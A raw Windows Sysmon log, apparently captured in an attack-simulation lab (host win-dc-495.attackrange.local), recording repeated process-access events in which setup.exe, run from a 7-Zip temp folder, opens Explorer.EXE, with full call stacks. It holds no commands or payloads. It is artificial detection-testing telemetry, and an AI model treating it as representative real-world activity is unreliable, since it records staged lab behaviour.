13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3